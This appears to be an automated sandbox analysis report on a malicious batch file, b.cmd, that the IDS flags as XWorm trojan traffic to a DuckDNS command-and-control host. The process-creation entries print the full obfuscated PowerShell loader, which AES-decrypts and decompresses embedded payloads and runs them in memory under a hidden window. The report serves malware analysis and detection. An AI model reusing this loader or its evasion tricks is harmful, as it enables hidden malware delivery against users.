Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\en-US\MSVFW32.dll.muiJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\wbem\en-US\wmiutils.dll.muiJump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 101.99.92.203:7000
Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 101.99.92.203:7000 -> 192.168.2.4:49732
Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49732 -> 101.99.92.203:7000
Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 101.99.92.203:7000 -> 192.168.2.4:49732
Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 101.99.92.203:7000
Source: unknownDNS query: name: dcxwq1.duckdns.org
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 101.99.92.203:7000
Source: Joe Sandbox ViewIP Address: 101.99.92.203 101.99.92.203
Source: Joe Sandbox ViewASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: dcxwq1.duckdns.org
Source: powershell.exe, 00000008.00000002.1771404228.000001FCB7943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1756758005.000001FCA7B5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1771404228.000001FCB780D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA9343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA7781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.o
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA9159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA9343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA7781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA9343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA8CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1771404228.000001FCB7943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1756758005.000001FCA7A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1771404228.000001FCB780D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA9159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA9159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B796E208_2_00007FFD9B796E20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B79CA908_2_00007FFD9B79CA90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B79CA358_2_00007FFD9B79CA35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B7948FD8_2_00007FFD9B7948FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B79C93B8_2_00007FFD9B79C93B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B79F8D88_2_00007FFD9B79F8D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B79F50D8_2_00007FFD9B79F50D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B797CA08_2_00007FFD9B797CA0
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2162
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2162Jump to behavior
Source: classification engineClassification label: mal84.troj.evad.winCMD@15/7@3/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\dsOejpCEgmpWzw8P
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaksudmg.0xf.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: b.cmdReversingLabs: Detection: 23%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\b.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\b.cmd"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\b.cmd';$rWNT='DecpxHCopxHCmppxHCrespxHCspxHC'.Replace('pxHC', ''),'MaTGyrinTGyrMTGyroTGyrdTGyrulTGyreTGyr'.Replace('TGyr', ''),'CrYsKteYsKtateYsKtDYsKteYsKtcrYsKtypYsKttoYsKtrYsKt'.Replace('YsKt', ''),'Idnlzndnlzvdnlzokdnlzednlz'.Replace('dnlz', ''),'TraGoiknsfGoikoGoikrmFGoikinaGoiklBlGoikockGoik'.Replace('Goik', ''),'LoStkNadStkN'.Replace('StkN', ''),'FroMxWcmBaMxWcse6MxWc4StMxWcriMxWcngMxWc'.Replace('MxWc', ''),'EnrgYjtrrgYjyrgYjPorgYjinrgYjtrgYj'.Replace('rgYj', ''),'CqJGUopqJGUyqJGUTqJGUoqJGU'.Replace('qJGU', ''),'ElywTEeywTEmenywTEtAywTEtywTE'.Replace('ywTE', ''),'ReaMpXgdLMpXgineMpXgsMpXg'.Replace('MpXg', ''),'CeuHLheuHLangeuHLeExeuHLteeuHLnseuHLioneuHL'.Replace('euHL', ''),'SKlTEpliKlTEtKlTE'.Replace('KlTE', ''),'GzasmetzasmCuzasmrrzasmentzasmPrzasmocezasmszasmszasm'.Replace('zasm', '');powershell -w hidden;function OgEIm($Xyfkn){$KStrb=[System.Security.Cryptography.Aes]::Create();$KStrb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KStrb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KStrb.Key=[System.Convert]::($rWNT[6])('xA1+WTJaPCUsOeL/aM8gYjpdFXCHAzsSe7O9jqgG6tE=');$KStrb.IV=[System.Convert]::($rWNT[6])('o+k4tdVDsXdevRbseXqo5Q==');$OoABI=$KStrb.($rWNT[2])();$gCRFY=$OoABI.($rWNT[4])($Xyfkn,0,$Xyfkn.Length);$OoABI.Dispose();$KStrb.Dispose();$gCRFY;}function bkQvC($Xyfkn){$pXxPg=New-Object System.IO.MemoryStream(,$Xyfkn);$ztkwM=New-Object System.IO.MemoryStream;$RxDER=New-Object System.IO.Compression.GZipStream($pXxPg,[IO.Compression.CompressionMode]::($rWNT[0]));$RxDER.($rWNT[8])($ztkwM);$RxDER.Dispose();$pXxPg.Dispose();$ztkwM.Dispose();$ztkwM.ToArray();}$QaWhK=[System.IO.File]::($rWNT[10])([Console]::Title);$TOEth=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 5).Substring(2))));$kobGz=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 6).Substring(2))));[System.Reflection.Assembly]::($rWNT[5])([byte[]]$kobGz).($rWNT[7]).($rWNT[3])($null,$null);[System.Reflection.Assembly]::($rWNT[5])([byte[]]$TOEth).($rWNT[7]).($rWNT[3])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\b.cmd" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\b.cmd';$rWNT='DecpxHCopxHCmppxHCrespxHCspxHC'.Replace('pxHC', ''),'MaTGyrinTGyrMTGyroTGyrdTGyrulTGyreTGyr'.Replace('TGyr', ''),'CrYsKteYsKtateYsKtDYsKteYsKtcrYsKtypYsKttoYsKtrYsKt'.Replace('YsKt', ''),'Idnlzndnlzvdnlzokdnlzednlz'.Replace('dnlz', ''),'TraGoiknsfGoikoGoikrmFGoikinaGoiklBlGoikockGoik'.Replace('Goik', ''),'LoStkNadStkN'.Replace('StkN', ''),'FroMxWcmBaMxWcse6MxWc4StMxWcriMxWcngMxWc'.Replace('MxWc', ''),'EnrgYjtrrgYjyrgYjPorgYjinrgYjtrgYj'.Replace('rgYj', ''),'CqJGUopqJGUyqJGUTqJGUoqJGU'.Replace('qJGU', ''),'ElywTEeywTEmenywTEtAywTEtywTE'.Replace('ywTE', ''),'ReaMpXgdLMpXgineMpXgsMpXg'.Replace('MpXg', ''),'CeuHLheuHLangeuHLeExeuHLteeuHLnseuHLioneuHL'.Replace('euHL', ''),'SKlTEpliKlTEtKlTE'.Replace('KlTE', ''),'GzasmetzasmCuzasmrrzasmentzasmPrzasmocezasmszasmszasm'.Replace('zasm', '');powershell -w hidden;function OgEIm($Xyfkn){$KStrb=[System.Security.Cryptography.Aes]::Create();$KStrb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KStrb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KStrb.Key=[System.Convert]::($rWNT[6])('xA1+WTJaPCUsOeL/aM8gYjpdFXCHAzsSe7O9jqgG6tE=');$KStrb.IV=[System.Convert]::($rWNT[6])('o+k4tdVDsXdevRbseXqo5Q==');$OoABI=$KStrb.($rWNT[2])();$gCRFY=$OoABI.($rWNT[4])($Xyfkn,0,$Xyfkn.Length);$OoABI.Dispose();$KStrb.Dispose();$gCRFY;}function bkQvC($Xyfkn){$pXxPg=New-Object System.IO.MemoryStream(,$Xyfkn);$ztkwM=New-Object System.IO.MemoryStream;$RxDER=New-Object System.IO.Compression.GZipStream($pXxPg,[IO.Compression.CompressionMode]::($rWNT[0]));$RxDER.($rWNT[8])($ztkwM);$RxDER.Dispose();$pXxPg.Dispose();$ztkwM.Dispose();$ztkwM.ToArray();}$QaWhK=[System.IO.File]::($rWNT[10])([Console]::Title);$TOEth=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 5).Substring(2))));$kobGz=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 6).Substring(2))));[System.Reflection.Assembly]::($rWNT[5])([byte[]]$kobGz).($rWNT[7]).($rWNT[3])($null,$null);[System.Reflection.Assembly]::($rWNT[5])([byte[]]$TOEth).($rWNT[7]).($rWNT[3])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: e.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbY source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdba source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Nf.pdbA source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: G_FORCE_FREE_LIBRARY.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B790BF8 pushad ; retf 8_2_00007FFD9B790C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B790BCE pushad ; retf 8_2_00007FFD9B790C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B792335 push eax; iretd 8_2_00007FFD9B79237D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B7A095D push esp; retf 8_2_00007FFD9B7A095E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B797938 push ebx; retf 8_2_00007FFD9B79796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B79785E push eax; iretd 8_2_00007FFD9B79786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B7900BD pushad ; iretd 8_2_00007FFD9B7900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B79776A pushad ; iretd 8_2_00007FFD9B79785D
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
